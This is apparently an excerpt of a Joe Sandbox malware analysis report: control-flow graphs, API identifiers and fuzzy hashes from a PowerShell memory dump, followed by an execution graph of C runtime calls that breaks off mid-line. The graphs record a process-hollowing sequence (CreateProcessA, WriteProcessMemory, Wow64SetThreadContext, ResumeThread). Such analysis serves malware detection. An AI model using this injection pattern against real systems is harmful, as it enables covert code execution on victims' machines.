                                                      control_flow_graph 198 7ff848d5a084-7ff848d5a08b 199 7ff848d5a08d-7ff848d5a095 198->199 200 7ff848d5a096-7ff848d5a164 198->200 199->200 204 7ff848d5a166-7ff848d5a175 200->204 205 7ff848d5a1c2-7ff848d5a1f4 200->205 204->205 206 7ff848d5a177-7ff848d5a17a 204->206 212 7ff848d5a1f6-7ff848d5a205 205->212 213 7ff848d5a252-7ff848d5a2c6 205->213 207 7ff848d5a17c-7ff848d5a18f 206->207 208 7ff848d5a1b4-7ff848d5a1bc 206->208 210 7ff848d5a191 207->210 211 7ff848d5a193-7ff848d5a1a6 207->211 208->205 210->211 211->211 214 7ff848d5a1a8-7ff848d5a1b0 211->214 212->213 215 7ff848d5a207-7ff848d5a20a 212->215 219 7ff848d5a2c8-7ff848d5a2d7 213->219 220 7ff848d5a324-7ff848d5a42d CreateProcessA 213->220 214->208 217 7ff848d5a20c-7ff848d5a21f 215->217 218 7ff848d5a244-7ff848d5a24c 215->218 221 7ff848d5a221 217->221 222 7ff848d5a223-7ff848d5a236 217->222 218->213 219->220 223 7ff848d5a2d9-7ff848d5a2dc 219->223 233 7ff848d5a42f 220->233 234 7ff848d5a435-7ff848d5a4c6 call 7ff848d5a4e2 220->234 221->222 222->222 224 7ff848d5a238-7ff848d5a240 222->224 225 7ff848d5a2de-7ff848d5a2f1 223->225 226 7ff848d5a316-7ff848d5a31e 223->226 224->218 228 7ff848d5a2f5-7ff848d5a308 225->228 229 7ff848d5a2f3 225->229 226->220 228->228 231 7ff848d5a30a-7ff848d5a312 228->231 229->228 231->226 233->234 243 7ff848d5a4cd-7ff848d5a4e1 234->243 244 7ff848d5a4c8 234->244 244->243
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2789502672.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 600c9190e766284839e04f8e0879ae840d9d39663f65935b41c8813d68de6fb7
                                                      • Instruction ID: b3c5fc19adb4f40ff2f707eba1c8f82df8bf720412a8745cb8bbfd6ce2c2b4bf
                                                      • Opcode Fuzzy Hash: 600c9190e766284839e04f8e0879ae840d9d39663f65935b41c8813d68de6fb7
                                                      • Instruction Fuzzy Hash: A6D1A330919A8D8FEB68EF18DC467E977D1FB59310F00422ED84EC7291DF74A9858B82

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 245 7ff848d59d24-7ff848d59d2b 246 7ff848d59d2d-7ff848d59d35 245->246 247 7ff848d59d36-7ff848d59d4a 245->247 246->247 248 7ff848d59d4c-7ff848d59d91 247->248 249 7ff848d59d94-7ff848d59dc5 247->249 248->249 252 7ff848d59dcf-7ff848d59e24 WriteProcessMemory 249->252 253 7ff848d59dc7-7ff848d59dcc 249->253 255 7ff848d59e2c-7ff848d59e5d 252->255 256 7ff848d59e26 252->256 253->252 256->255
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2789502672.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 7393fc2fe50e90fff3e324870a91714b75351aaa38a38e32f366f505eec1e9f6
                                                      • Instruction ID: 3b8739cef2ef727c58df28f311163b589c9c1631d3a8399a1cc3dab6c55aeacd
                                                      • Opcode Fuzzy Hash: 7393fc2fe50e90fff3e324870a91714b75351aaa38a38e32f366f505eec1e9f6
                                                      • Instruction Fuzzy Hash: 3041F731D0DB185FDB18AB98A8066F9BBE0FB95350F00426FE449D3286CB74A8498795

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 258 7ff848d59b18-7ff848d59b1f 259 7ff848d59b2a-7ff848d59b3a 258->259 260 7ff848d59b21-7ff848d59b29 258->260 261 7ff848d59b3c-7ff848d59b82 259->261 262 7ff848d59b84-7ff848d59b9d 259->262 260->259 261->262 266 7ff848d59b9f-7ff848d59ba4 262->266 267 7ff848d59ba7-7ff848d59be2 Wow64SetThreadContext 262->267 266->267 269 7ff848d59bea-7ff848d59c19 267->269 270 7ff848d59be4 267->270 270->269
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2789502672.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 6e0c3936b276ba458614968bafe8d862813f54bd4f9fbb1c31fde1afe48cc3f9
                                                      • Instruction ID: fc86e2fd46cd24dc471d6f173b40ef183b9dff3ef96db3344daf3fc9c54ba6d2
                                                      • Opcode Fuzzy Hash: 6e0c3936b276ba458614968bafe8d862813f54bd4f9fbb1c31fde1afe48cc3f9
                                                      • Instruction Fuzzy Hash: DD312A31D0DB184FEB29AB68A8456FABBE1EF55311F04023FD04AD3582DF74640A8795

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 272 7ff848d59a1d-7ff848d59a29 273 7ff848d59a2b-7ff848d59a33 272->273 274 7ff848d59a34-7ff848d59a43 272->274 273->274 275 7ff848d59a4e-7ff848d59a5a 274->275 276 7ff848d59a45-7ff848d59a4d 274->276 277 7ff848d59a5c-7ff848d59aa3 275->277 278 7ff848d59aa4-7ff848d59ae4 ResumeThread 275->278 276->275 277->278 283 7ff848d59aec-7ff848d59b11 278->283 284 7ff848d59ae6 278->284 284->283
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2789502672.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 0c9777edd8a5cf57f409089dfc7b37fa6dc4730144035b78fb3e8e7bc56b08fc
                                                      • Instruction ID: 0df661823ed4d2299cc6a6d78533b0d3567ec522c28f926665ab25f8ba6d4536
                                                      • Opcode Fuzzy Hash: 0c9777edd8a5cf57f409089dfc7b37fa6dc4730144035b78fb3e8e7bc56b08fc
                                                      • Instruction Fuzzy Hash: 4E31163090E7885FEB5ADB6898567E9BFE0EF56320F0442ABD049C7197CA786405C762

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2800566071.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 06be4fa4ecfc0edb8180e8245d6e04d726f04640d38ce62dfe776bfbc69bb38d
                                                      • Instruction ID: 6e66638c8dddd2daad88870124b30753babfcbfccfd324da295773501ef7569c
                                                      • Opcode Fuzzy Hash: 06be4fa4ecfc0edb8180e8245d6e04d726f04640d38ce62dfe776bfbc69bb38d
                                                      • Instruction Fuzzy Hash: 7B91B222A0DBC58FE797AB3C58655607FE0EF57250B0905FBC488CB1E3DA29AC49C355

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2800566071.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90932e65534b7cb32cdc6a11d7ebc61d600be398c835375a6c2af9e01ea2a814
                                                      • Instruction ID: 625adbe12a473b3225fcf09680e49e7b241c35408fac1b7aa55cc77c34adfef8
                                                      • Opcode Fuzzy Hash: 90932e65534b7cb32cdc6a11d7ebc61d600be398c835375a6c2af9e01ea2a814
                                                      • Instruction Fuzzy Hash: 3441A521A0DBC98FDB47EB3888609607FB1EF67244B0905EBC489CB1E3CA25EC49C751

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 597 7ff848e20aa1-7ff848e20aa8 598 7ff848e20aaa 597->598 599 7ff848e20aac-7ff848e20ae4 597->599 598->599 602 7ff848e20c09-7ff848e20cb9 599->602 603 7ff848e20aea-7ff848e20af4 599->603 639 7ff848e20cbb 602->639 640 7ff848e20cbc-7ff848e20ccd 602->640 604 7ff848e20b0d-7ff848e20b12 603->604 605 7ff848e20af6-7ff848e20b03 603->605 608 7ff848e20b18-7ff848e20b1b 604->608 609 7ff848e20baa-7ff848e20bb4 604->609 605->604 610 7ff848e20b05-7ff848e20b0b 605->610 608->609 612 7ff848e20b21-7ff848e20b24 608->612 613 7ff848e20bc3-7ff848e20c06 609->613 614 7ff848e20bb6-7ff848e20bc2 609->614 610->604 617 7ff848e20b4b 612->617 618 7ff848e20b26-7ff848e20b49 612->618 613->602 619 7ff848e20b4d-7ff848e20b4f 617->619 618->619 619->609 624 7ff848e20b51-7ff848e20b5b 619->624 624->609 630 7ff848e20b5d-7ff848e20b73 624->630 634 7ff848e20b7a-7ff848e20b83 630->634 635 7ff848e20b9c-7ff848e20ba9 634->635 636 7ff848e20b85-7ff848e20b92 634->636 636->635 641 7ff848e20b94-7ff848e20b9a 636->641 639->640 642 7ff848e20ccf 640->642 643 7ff848e20cd0-7ff848e20d53 640->643 641->635 642->643 647 7ff848e20d59-7ff848e20d62 643->647 648 7ff848e20e32-7ff848e20e3c 643->648 647->648 649 7ff848e20e48-7ff848e20e88 648->649 650 7ff848e20e3e-7ff848e20e47 648->650
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2800566071.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00a258eb1c9f845a252fbba160bced8d9be80d6066482e80d7d050a7dbcf223e
                                                      • Instruction ID: ba3b50133d43213aae40b744fc275784d46d67d3f4daff52381566fedd83f6b9
                                                      • Opcode Fuzzy Hash: 00a258eb1c9f845a252fbba160bced8d9be80d6066482e80d7d050a7dbcf223e
                                                      • Instruction Fuzzy Hash: 2A316432E1DE4E4FE7B9B62804682B567D1FF55794F4800BAC40CC31C2DF29AC058659

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 675 7ff848e205b9-7ff848e205c5 677 7ff848e205cb-7ff848e205ce 675->677 678 7ff848e20670-7ff848e2067a 675->678 681 7ff848e205d0-7ff848e205e3 677->681 682 7ff848e205e5 677->682 679 7ff848e2068b-7ff848e206a9 678->679 680 7ff848e2067c-7ff848e2068a 678->680 695 7ff848e206ad-7ff848e20717 679->695 683 7ff848e205e7-7ff848e205e9 681->683 682->683 683->678 686 7ff848e205ef-7ff848e205f5 683->686 688 7ff848e20611-7ff848e20617 686->688 689 7ff848e205f7-7ff848e20604 686->689 690 7ff848e20619-7ff848e20631 688->690 691 7ff848e20633-7ff848e20637 688->691 689->688 693 7ff848e20606-7ff848e2060f 689->693 690->691 696 7ff848e2063e-7ff848e20647 691->696 693->688 709 7ff848e20719-7ff848e20787 695->709 699 7ff848e20649-7ff848e20656 696->699 700 7ff848e20660-7ff848e2066f 696->700 699->700 704 7ff848e20658-7ff848e2065e 699->704 704->700 716 7ff848e20789 709->716 717 7ff848e2078e-7ff848e2079f 709->717 716->717 718 7ff848e2078b 716->718 719 7ff848e207a1 717->719 720 7ff848e207a6-7ff848e207cd 717->720 718->717 719->720 721 7ff848e207a3 719->721 723 7ff848e207cf-7ff848e207f0 720->723 724 7ff848e207ce 720->724 721->720 725 7ff848e207f2-7ff848e20802 723->725 726 7ff848e20817-7ff848e20837 723->726 724->723 729 7ff848e2084c-7ff848e20852 725->729 730 7ff848e20804-7ff848e2080a 725->730 727 7ff848e2083d-7ff848e20847 726->727 728 7ff848e2098f-7ff848e20a41 726->728 731 7ff848e20849-7ff848e2084a 727->731 732 7ff848e20863-7ff848e20870 727->732 777 7ff848e20a43 728->777 778 7ff848e20a44-7ff848e20a55 728->778 735 7ff848e20854-7ff848e20856 729->735 730->735 737 7ff848e2080c-7ff848e20816 730->737 731->729 742 7ff848e20930-7ff848e2093a 732->742 743 7ff848e20876-7ff848e20879 732->743 735->732 738 7ff848e20858-7ff848e20861 735->738 737->726 738->732 746 7ff848e20949-7ff848e2098c 742->746 747 7ff848e2093c-7ff848e20948 742->747 743->742 749 7ff848e2087f-7ff848e20887 743->749 746->728 749->728 752 7ff848e2088d-7ff848e20897 749->752 753 7ff848e20899-7ff848e208a9 752->753 754 7ff848e208b0-7ff848e208b4 752->754 759 7ff848e208ab-7ff848e208ae 753->759 760 7ff848e208df-7ff848e208f9 753->760 754->742 757 7ff848e208b6-7ff848e208b9 754->757 761 7ff848e208bb-7ff848e208c4 757->761 762 7ff848e208d0-7ff848e208d4 757->762 759->754 769 7ff848e208fb-7ff848e20909 760->769 761->762 762->742 768 7ff848e208d6-7ff848e208dc 762->768 768->769 770 7ff848e208de 768->770 775 7ff848e2090b-7ff848e20918 769->775 776 7ff848e20922-7ff848e2092f 769->776 770->760 775->776 782 7ff848e2091a-7ff848e20920 775->782 777->778 780 7ff848e20a58-7ff848e20a68 778->780 781 7ff848e20a57 778->781 783 7ff848e20a6a-7ff848e20aa2 780->783 784 7ff848e20aa3-7ff848e20aa8 780->784 781->780 782->776 783->784 785 7ff848e20aaa 784->785 786 7ff848e20aac-7ff848e20ae4 784->786 785->786 792 7ff848e20c09-7ff848e20cb9 786->792 793 7ff848e20aea-7ff848e20af4 786->793 829 7ff848e20cbb 792->829 830 7ff848e20cbc-7ff848e20ccd 792->830 794 7ff848e20b0d-7ff848e20b12 793->794 795 7ff848e20af6-7ff848e20b03 793->795 798 7ff848e20b18-7ff848e20b1b 794->798 799 7ff848e20baa-7ff848e20bb4 794->799 795->794 800 7ff848e20b05-7ff848e20b0b 795->800 798->799 802 7ff848e20b21-7ff848e20b24 798->802 803 7ff848e20bc3-7ff848e20c06 799->803 804 7ff848e20bb6-7ff848e20bc2 799->804 800->794 807 7ff848e20b4b 802->807 808 7ff848e20b26-7ff848e20b49 802->808 803->792 809 7ff848e20b4d-7ff848e20b4f 807->809 808->809 809->799 814 7ff848e20b51-7ff848e20b5b 809->814 814->799 820 7ff848e20b5d-7ff848e20b73 814->820 824 7ff848e20b7a-7ff848e20b83 820->824 825 7ff848e20b9c-7ff848e20ba9 824->825 826 7ff848e20b85-7ff848e20b92 824->826 826->825 831 7ff848e20b94-7ff848e20b9a 826->831 829->830 832 7ff848e20ccf 830->832 833 7ff848e20cd0-7ff848e20d53 830->833 831->825 832->833 837 7ff848e20d59-7ff848e20d62 833->837 838 7ff848e20e32-7ff848e20e3c 833->838 837->838 839 7ff848e20e48-7ff848e20e88 838->839 840 7ff848e20e3e-7ff848e20e47 838->840
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2800566071.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39148577ec5d28fe9f0fc2b56f9e3fd3b1ec40157e07c52157465fa1aea85d55
                                                      • Instruction ID: aa85f18a653561b8b6eaac5139399251c408db5a8c2ce38ecded27b1f0fa7cda
                                                      • Opcode Fuzzy Hash: 39148577ec5d28fe9f0fc2b56f9e3fd3b1ec40157e07c52157465fa1aea85d55
                                                      • Instruction Fuzzy Hash: 05112C52F2EE5E5FF2B5B62C2819178A5C1FF84BA0F4801BAC41DC35C6DE19AC15019D

                                                      Execution Graph

                                                      Execution Coverage:2.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:2.6%
                                                      Total number of Nodes:1668
                                                      Total number of Limit Nodes:5
                                                      execution_graph 6511 10008640 6514 10008657 6511->6514 6515 10008665 6514->6515 6516 10008679 6514->6516 6517 10006368 __dosmaperr 20 API calls 6515->6517 6518 10008681 6516->6518 6519 10008693 6516->6519 6520 1000866a 6517->6520 6521 10006368 __dosmaperr 20 API calls 6518->6521 6526 10008652 6519->6526 6527 100054a7 6519->6527 6522 100062ac _abort 26 API calls 6520->6522 6523 10008686 6521->6523 6522->6526 6525 100062ac _abort 26 API calls 6523->6525 6525->6526 6528 100054ba 6527->6528 6529 100054c4 6527->6529 6528->6526 6529->6528 6530 10005af6 _abort 38 API calls 6529->6530 6531 100054e5 6530->6531 6535 10007a00 6531->6535 6536 10007a13 6535->6536 6537 100054fe 6535->6537 6536->6537 6543 10007f0f 6536->6543 6539 10007a2d 6537->6539 6540 10007a40 6539->6540 6541 10007a55 6539->6541 6540->6541 6678 10006d7e 6540->6678 6541->6528 6544 10007f1b ___scrt_is_nonwritable_in_current_image 6543->6544 6545 10005af6 _abort 38 API calls 6544->6545 6546 10007f24 6545->6546 6547 10007f72 _abort 6546->6547 6555 10005671 RtlEnterCriticalSection 6546->6555 6547->6537 6549 10007f42 6556 10007f86 6549->6556 6554 100055a8 _abort 38 API calls 6554->6547 6555->6549 6557 10007f56 6556->6557 6558 10007f94 __fassign 6556->6558 6560 10007f75 6557->6560 6558->6557 6563 10007cc2 6558->6563 6677 100056b9 RtlLeaveCriticalSection 6560->6677 6562 10007f69 6562->6547 6562->6554 6564 10007d42 6563->6564 6567 10007cd8 6563->6567 6565 10007d90 6564->6565 6568 1000571e _free 20 API calls 6564->6568 6631 10007e35 6565->6631 6567->6564 6569 10007d0b 6567->6569 6574 1000571e _free 20 API calls 6567->6574 6570 10007d64 6568->6570 6571 10007d2d 6569->6571 6576 1000571e _free 20 API calls 6569->6576 6572 1000571e _free 20 API calls 6570->6572 6573 1000571e _free 20 API calls 6571->6573 6575 10007d77 6572->6575 6578 10007d37 6573->6578 6580 10007d00 6574->6580 6577 1000571e _free 20 API calls 6575->6577 6582 10007d22 6576->6582 6583 10007d85 6577->6583 6584 1000571e _free 20 API calls 6578->6584 6579 10007dfe 6585 1000571e _free 20 API calls 6579->6585 6591 100090ba 6580->6591 6581 10007d9e 6581->6579 6589 1000571e 20 API calls _free 6581->6589 6619 100091b8 6582->6619 6588 1000571e _free 20 API calls 6583->6588 6584->6564 6590 10007e04 6585->6590 6588->6565 6589->6581 6590->6557 6592 100090cb 6591->6592 6618 100091b4 6591->6618 6593 100090dc 6592->6593 6594 1000571e _free 20 API calls 6592->6594 6595 100090ee 6593->6595 6597 1000571e _free 20 API calls 6593->6597 6594->6593 6596 10009100 6595->6596 6598 1000571e _free 20 API calls 6595->6598 6599 10009112 6596->6599 6600 1000571e _free 20 API calls 6596->6600 6597->6595 6598->6596 6601 10009124 6599->6601 6602 1000571e _free 20 API calls 6599->6602 6600->6599 6603 10009136 6601->6603 6605 1000571e _free 20 API calls 6601->6605 6602->6601 6604 10009148 6603->6604 6606 1000571e _free 20 API calls 6603->6606 6607 1000915a 6604->6607 6608 1000571e _free 20 API calls 6604->6608 6605->6603 6606->6604 6609 1000571e _free 20 API calls 6607->6609 6612 1000916c 6607->6612 6608->6607 6609->6612 6610 10009190 6615 100091a2 6610->6615 6616 1000571e _free 20 API calls 6610->6616 6611 1000917e 6611->6610 6614 1000571e _free 20 API calls 6611->6614 6612->6611 6613 1000571e _free 20 API calls 6612->6613 6613->6611 6614->6610 6617 1000571e _free 20 API calls 6615->6617 6615->6618 6616->6615 6617->6618 6618->6569 6620 100091c5 6619->6620 6630 1000921d 6619->6630 6621 1000571e _free 20 API calls 6620->6621 6622 100091d5 6620->6622 6621->6622 6623 100091e7 6622->6623 6624 1000571e _free 20 API calls 6622->6624 6625 100091f9 6623->6625 6627 1000571e _free 20 API calls 6623->6627 6624->6623 6626 1000920b 6625->6626 6628 1000571e _free 20 API calls 6625->6628 6629 1000571e _free 20 API calls 6626->6629 6626->6630 6627->6625 6628->6626 6629->6630 6630->6571 6632 10007e60 6631->6632 6633 10007e42 6631->6633 6632->6581 6633->6632 6637 1000925d 6633->6637 6636 1000571e _free 20 API calls 6636->6632 6638 10007e5a 6637->6638 6639 1000926e 6637->6639 6638->6636 6673 10009221 6639->6673 6642 10009221 __fassign 20 API calls 6643 10009281 6642->6643 6644 10009221 __fassign 20 API calls 6643->6644 6645 1000928c 6644->6645 6646 10009221 __fassign 20 API calls 6645->6646 6647 10009297 6646->6647 6648 10009221 __fassign 20 API calls 6647->6648 6649 100092a5 6648->6649 6650 1000571e _free 20 API calls 6649->6650 6651 100092b0 6650->6651 6652 1000571e _free 20 API calls 6651->6652 6653 100092bb 6652->6653 6654 1000571e _free 20 API calls 6653->6654 6655 100092c6 6654->6655 6656 10009221 __fassign 20 API calls 6655->6656 6657 100092d4 6656->6657 6658 10009221 __fassign 20 API calls 6657->6658 6659 100092e2 6658->6659 6660 10009221 __fassign 20 API calls 6659->6660 6661 100092f3 6660->6661 6662 10009221 __fassign 20 API calls 6661->6662 6663 10009301 6662->6663 6664 10009221 __fassign 20 API calls 6663->6664 6665 1000930f 6664->6665 6666 1000571e _free 20 API calls 6665->6666 6667 1000931a 6666->6667 6668 1000571e _free 20 API calls 6667->6668 6669 10009325 6668->6669 6670 1000571e _free 20 API calls 6669->6670 6671 10009330 6670->6671 6672 1000571e _free 20 API calls 6671->6672 6672->6638 6674 10009258 6673->6674 6675 10009248 6673->6675 6674->6642 6675->6674 6676 1000571e _free 20 API calls 6675->6676 6676->6675 6677->6562 6679 10006d8a ___scrt_is_nonwritable_in_current_image 6678->6679 6680 10005af6 _abort 38 API calls 6679->6680 6682 10006d94 6680->6682 6683 10006e18 _abort 6682->6683 6684 100055a8 _abort 38 API calls 6682->6684 6686 1000571e _free 20 API calls 6682->6686 6687 10005671 RtlEnterCriticalSection 6682->6687 6688 10006e0f 6682->6688 6683->6541 6684->6682 6686->6682 6687->6682 6691 100056b9 RtlLeaveCriticalSection 6688->6691 6690 10006e16 6690->6682 6691->6690 7258 10007a80 7259 10007a8d 7258->7259 7260 1000637b _abort 20 API calls 7259->7260 7261 10007aa7 7260->7261 7262 1000571e _free 20 API calls 7261->7262 7263 10007ab3 7262->7263 7264 1000637b _abort 20 API calls 7263->7264 7267 10007ad9 7263->7267 7266 10007acd 7264->7266 7265 10005eb7 11 API calls 7265->7267 7268 1000571e _free 20 API calls 7266->7268 7267->7265 7269 10007ae5 7267->7269 7268->7267 6083 10007103 GetCommandLineA GetCommandLineW 6084 10005303 6087 100050a5 6084->6087 6096 1000502f 6087->6096 6090 1000502f 5 API calls 6091 100050c3 6090->6091 6100 10005000 6091->6100 6094 10005000 20 API calls 6095 100050d9 6094->6095 6097 10005048 6096->6097 6098 10002ada _ValidateLocalCookies 5 API calls 6097->6098 6099 10005069 6098->6099 6099->6090 6101 1000502a 6100->6101 6102 1000500d 6100->6102 6101->6094 6103 10005024 6102->6103 6104 1000571e _free 20 API calls 6102->6104 6105 1000571e _free 20 API calls 6103->6105 6104->6102 6105->6101 6692 1000af43 6693 1000af59 6692->6693 6694 1000af4d 6692->6694 6694->6693 6695 1000af52 CloseHandle 6694->6695 6695->6693 6696 1000a945 6697 1000a96d 6696->6697 6698 1000a9a5 6697->6698 6699 1000a997 6697->6699 6700 1000a99e 6697->6700 6705 1000aa17 6699->6705 6709 1000aa00 6700->6709 6706 1000aa20 6705->6706 6713 1000b19b 6706->6713 6710 1000aa20 6709->6710 6711 1000b19b __startOneArgErrorHandling 21 API calls 6710->6711 6712 1000a9a3 6711->6712 6714 1000b1da __startOneArgErrorHandling 6713->6714 6716 1000b25c __startOneArgErrorHandling 6714->6716 6723 1000b59e 6714->6723 6721 1000b286 6716->6721 6726 100078a3 6716->6726 6718 1000b292 6720 10002ada _ValidateLocalCookies 5 API calls 6718->6720 6722 1000a99c 6720->6722 6721->6718 6730 1000b8b2 6721->6730 6737 1000b5c1 6723->6737 6727 100078cb 6726->6727 6728 10002ada _ValidateLocalCookies 5 API calls 6727->6728 6729 100078e8 6728->6729 6729->6721 6731 1000b8d4 6730->6731 6732 1000b8bf 6730->6732 6734 10006368 __dosmaperr 20 API calls 6731->6734 6733 1000b8d9 6732->6733 6735 10006368 __dosmaperr 20 API calls 6732->6735 6733->6718 6734->6733 6736 1000b8cc 6735->6736 6736->6718 6738 1000b5ec __raise_exc 6737->6738 6739 1000b7e5 RaiseException 6738->6739 6740 1000b5bc 6739->6740 6740->6716 7521 1000a1c6 IsProcessorFeaturePresent 7522 10007bc7 7523 10007bd3 ___scrt_is_nonwritable_in_current_image 7522->7523 7524 10007c0a _abort 7523->7524 7530 10005671 RtlEnterCriticalSection 7523->7530 7526 10007be7 7527 10007f86 __fassign 20 API calls 7526->7527 7528 10007bf7 7527->7528 7531 10007c10 7528->7531 7530->7526 7534 100056b9 RtlLeaveCriticalSection 7531->7534 7533 10007c17 7533->7524 7534->7533 6741 10005348 6742 10003529 ___vcrt_uninitialize 8 API calls 6741->6742 6743 1000534f 6742->6743 6744 10007b48 6754 10008ebf 6744->6754 6748 10007b55 6767 1000907c 6748->6767 6751 10007b7f 6752 1000571e _free 20 API calls 6751->6752 6753 10007b8a 6752->6753 6771 10008ec8 6754->6771 6756 10007b50 6757 10008fdc 6756->6757 6758 10008fe8 ___scrt_is_nonwritable_in_current_image 6757->6758 6791 10005671 RtlEnterCriticalSection 6758->6791 6760 1000905e 6805 10009073 6760->6805 6762 10009032 RtlDeleteCriticalSection 6765 1000571e _free 20 API calls 6762->6765 6763 1000906a _abort 6763->6748 6766 10008ff3 6765->6766 6766->6760 6766->6762 6792 1000a09c 6766->6792 6768 10009092 6767->6768 6769 10007b64 RtlDeleteCriticalSection 6767->6769 6768->6769 6770 1000571e _free 20 API calls 6768->6770 6769->6748 6769->6751 6770->6769 6772 10008ed4 ___scrt_is_nonwritable_in_current_image 6771->6772 6781 10005671 RtlEnterCriticalSection 6772->6781 6774 10008f77 6786 10008f97 6774->6786 6777 10008f83 _abort 6777->6756 6779 10008ee3 6779->6774 6780 10008e78 66 API calls 6779->6780 6782 10007b94 RtlEnterCriticalSection 6779->6782 6783 10008f6d 6779->6783 6780->6779 6781->6779 6782->6779 6789 10007ba8 RtlLeaveCriticalSection 6783->6789 6785 10008f75 6785->6779 6790 100056b9 RtlLeaveCriticalSection 6786->6790 6788 10008f9e 6788->6777 6789->6785 6790->6788 6791->6766 6793 1000a0a8 ___scrt_is_nonwritable_in_current_image 6792->6793 6794 1000a0b9 6793->6794 6795 1000a0ce 6793->6795 6796 10006368 __dosmaperr 20 API calls 6794->6796 6804 1000a0c9 _abort 6795->6804 6808 10007b94 RtlEnterCriticalSection 6795->6808 6798 1000a0be 6796->6798 6800 100062ac _abort 26 API calls 6798->6800 6799 1000a0ea 6809 1000a026 6799->6809 6800->6804 6802 1000a0f5 6825 1000a112 6802->6825 6804->6766 7073 100056b9 RtlLeaveCriticalSection 6805->7073 6807 1000907a 6807->6763 6808->6799 6810 1000a033 6809->6810 6811 1000a048 6809->6811 6812 10006368 __dosmaperr 20 API calls 6810->6812 6817 1000a043 6811->6817 6828 10008e12 6811->6828 6813 1000a038 6812->6813 6815 100062ac _abort 26 API calls 6813->6815 6815->6817 6817->6802 6818 1000907c 20 API calls 6819 1000a064 6818->6819 6834 10007a5a 6819->6834 6821 1000a06a 6841 1000adce 6821->6841 6824 1000571e _free 20 API calls 6824->6817 7072 10007ba8 RtlLeaveCriticalSection 6825->7072 6827 1000a11a 6827->6804 6829 10008e2a 6828->6829 6830 10008e26 6828->6830 6829->6830 6831 10007a5a 26 API calls 6829->6831 6830->6818 6832 10008e4a 6831->6832 6856 10009a22 6832->6856 6835 10007a66 6834->6835 6836 10007a7b 6834->6836 6837 10006368 __dosmaperr 20 API calls 6835->6837 6836->6821 6838 10007a6b 6837->6838 6839 100062ac _abort 26 API calls 6838->6839 6840 10007a76 6839->6840 6840->6821 6842 1000adf2 6841->6842 6843 1000addd 6841->6843 6844 1000ae2d 6842->6844 6849 1000ae19 6842->6849 6845 10006355 __dosmaperr 20 API calls 6843->6845 6846 10006355 __dosmaperr 20 API calls 6844->6846 6847 1000ade2 6845->6847 6850 1000ae32 6846->6850 6848 10006368 __dosmaperr 20 API calls 6847->6848 6853 1000a070 6848->6853 7029 1000ada6 6849->7029 6852 10006368 __dosmaperr 20 API calls 6850->6852 6854 1000ae3a 6852->6854 6853->6817 6853->6824 6855 100062ac _abort 26 API calls 6854->6855 6855->6853 6857 10009a2e ___scrt_is_nonwritable_in_current_image 6856->6857 6858 10009a36 6857->6858 6859 10009a4e 6857->6859 6881 10006355 6858->6881 6861 10009aec 6859->6861 6865 10009a83 6859->6865 6863 10006355 __dosmaperr 20 API calls 6861->6863 6866 10009af1 6863->6866 6864 10006368 __dosmaperr 20 API calls 6867 10009a43 _abort 6864->6867 6884 